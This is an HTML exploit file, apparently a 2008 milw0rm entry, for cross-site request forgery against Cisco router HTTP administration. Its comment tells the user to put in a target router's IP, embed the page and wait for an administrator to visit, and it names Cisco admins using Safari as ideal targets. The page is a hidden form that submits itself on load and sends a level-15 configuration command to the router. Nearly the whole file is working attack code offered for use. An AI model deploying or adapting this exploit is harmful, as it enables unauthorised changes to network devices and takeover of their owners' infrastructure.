26 lines
No EOL
715 B
HTML
26 lines
No EOL
715 B
HTML
<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
|
|
Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2
|
|
Replace "10.10.10.1" with the IP address of the target router, embed this in a web
|
|
page and hope for the best. Cisco Admin's + Safari are the best targets ;) -->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
|
|
<body onload="fdsa.submit();">
|
|
|
|
|
|
|
|
<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">
|
|
|
|
<input type=hidden name=command value="alias exec xx xx">
|
|
|
|
|
|
|
|
<input type=hidden name=command_url value="/level/15/exec/-">
|
|
<input type=hidden name=new_command_url value="/level/15/configure/-">
|
|
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2008-09-17] |